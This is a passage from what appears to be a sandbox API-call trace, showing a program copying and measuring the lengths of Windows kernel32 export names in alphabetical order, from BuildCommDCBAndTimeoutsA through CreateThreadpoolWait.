returned="BuildCommDCBAndTimeoutsA" [0087.408] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.408] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.408] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.408] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.408] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.408] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.408] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.408] lstrlenA (lpString="CANCELIO") returned 8 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.408] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.408] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.408] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.408] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.408] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.408] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.408] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.408] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.409] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.409] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.409] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.409] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.409] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.409] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.409] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.409] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.409] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.409] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.409] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.409] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.409] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.409] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.409] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.409] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.409] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.409] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.409] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.410] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.410] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.410] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.410] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.410] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.410] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.410] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.410] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.410] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.410] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.410] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.410] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.410] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.410] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.410] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.410] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.410] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.410] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.410] lstrlenA (lpString="COPYFILEA") returned 9 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.411] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.411] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.411] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.411] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.411] lstrlenA (lpString="COPYFILEW") returned 9 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.411] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.411] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.411] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.411] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.411] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.411] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.411] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.411] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.411] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.411] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.411] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.411] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.411] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.412] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.412] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.412] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.412] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.412] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.412] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.412] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.412] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.412] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.412] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.412] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.412] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.412] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.412] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.412] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.412] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.412] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.412] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.413] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.413] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.413] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.413] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.413] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.413] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.413] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.413] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.413] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.413] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.413] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.413] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.413] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.413] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.413] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.413] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.413] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.413] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.413] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.414] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.414] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.414] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.414] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.414] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.414] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.414] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.414] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.414] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.414] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.414] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.414] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.414] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.414] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.414] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.414] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.414] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.414] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.415] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.415] 